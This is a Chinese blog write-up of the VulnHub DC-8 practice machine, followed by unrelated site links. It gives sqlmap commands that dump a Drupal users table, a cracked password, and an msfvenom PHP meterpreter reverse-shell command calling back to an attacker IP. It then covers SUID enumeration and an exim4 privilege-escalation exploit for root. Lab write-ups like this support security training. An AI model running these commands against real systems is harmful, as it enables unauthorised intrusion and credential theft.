当前位置:网站首页>vulnhub之dc8
vulnhub之dc8
2022-06-26 21:45:00 【天下 (天衍师)】
各位小伙伴,可直接看这位师傅
https://blog.csdn.net/weixin_44288604/article/details/122944302
个人写的很粗糙
DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路
主机发现,端口扫描——挖掘服务漏洞——获取后台权限——上传shell——提权
主机发现,端口扫描,服务探测

一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测
burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示
这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下
点击到 http://192.168.43.142/?nid=3该界面时候,xray检测到存在sql注入,直接上sqlmap
发现存在两个数据库,d7db,information_schema,这里选择第一个d7db,查看表名
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
在众多的表里面选择users表,直接下载
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
发现存在两个用户,admin和john,但密码为加密之后的数据,尝试进行暴力破解,将这两个密文做成字典,使用john进行暴力破解,爆破出来其中john的密码为turtle,登录后台,查看能够上传shell的位置,这里建议使用谷歌浏览器,别问,问就是能够右键翻译
在这个界面中,可以定义输入表单之后的界面,这里采用msf生成php木马反弹,已经生成过了,不进行展示
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
打开该文件,将文件复制到上图位置,选择PHP code,并保存,然后在对应的表单提交复核格式的数据,即可接受到会话
python交互式shell,查找有sudo权限执行的文件
find / -perm -u=s -type f 2>/dev/null
发现存在exim4为sudo权限,查看版本,查找对应exp
exp大法,这里下载第二个,然后复制到攻击机上面,使用python开启http服务,目标机下载运行

获得root权限
边栏推荐
- AI intelligent matting tool - hair can be seen
- 中金财富开户安全吗?我想开户炒股。
- Homebrew installation in MacOS environment [email protected]
- Kdd2022 𞓜 unified session recommendation system based on knowledge enhancement prompt learning
- 财务费用分析怎么分析
- 会计要素包括哪些内容
- PostgreSQL notes
- VB.net类库,获取屏幕内鼠标下的颜色(进阶——3)
- 2022年,中轻度游戏出海路在何方?
- 股票炒股注册开户有没有什么风险?安全吗?
猜你喜欢

【 protobuf 】 quelques puits causés par la mise à niveau de protobuf

Leetcode(763)——划分字母区间

协同过滤进化版本NeuralCF及tensorflow2实现
![[solution] sword finger offer 15 Number of 1 in binary (C language)](/img/ab/149775ae8ed94464efdf6921c1022a.png)
[solution] sword finger offer 15 Number of 1 in binary (C language)

Treasure and niche cover PBR multi-channel mapping material website sharing

Leetcode question brushing: String 06 (implement strstr())

【题解】剑指 Offer 15. 二进制中1的个数(C语言)

VB.net类库(进阶版——1)

DAST 黑盒漏洞扫描器 第五篇:漏洞扫描引擎与服务能力

Record a redis large key troubleshooting
随机推荐
龙芯中科科创板上市:市值357亿 成国产CPU第一股
Solution of valuenotifier < list < t > > monitoring problem in fluent
Leetcode question brushing: String 02 (reverse string II)
Redis + Guava 本地缓存 API 组合,性能炸裂!
这个算BUG吗?乱填的字母是否可以关闭
网易云信正式加入中国医学装备协会智慧医院分会,为全国智慧医院建设加速...
[solution] sword finger offer 15 Number of 1 in binary (C language)
网络爬虫终篇:向10万级网易云用户发送定向消息
Leetcode question brushing: String 03 (Sword finger offer 05. replace space)
The importance of using fonts correctly in DataWindow
360手机助手首家接入APP签名服务系统 助力隐私安全分发
VB.net类库(进阶版——1)
Installation avec homebrew dans un environnement Mac OS [email protected]
MATLAB与Mysql数据库连接并数据交换(基于ODBC)
leetcode:6103. 从树中删除边的最小分数【dfs + 联通分量 + 子图的值记录】
矩阵求导及其链式法则
Netease Yunxin officially joined the smart hospital branch of China Medical Equipment Association to accelerate the construction of smart hospitals across the country
Introduction to dependency injection in SAP Spartacus
十大券商注册开户有没有什么风险?安全吗?
random_ normal_ Initializer uses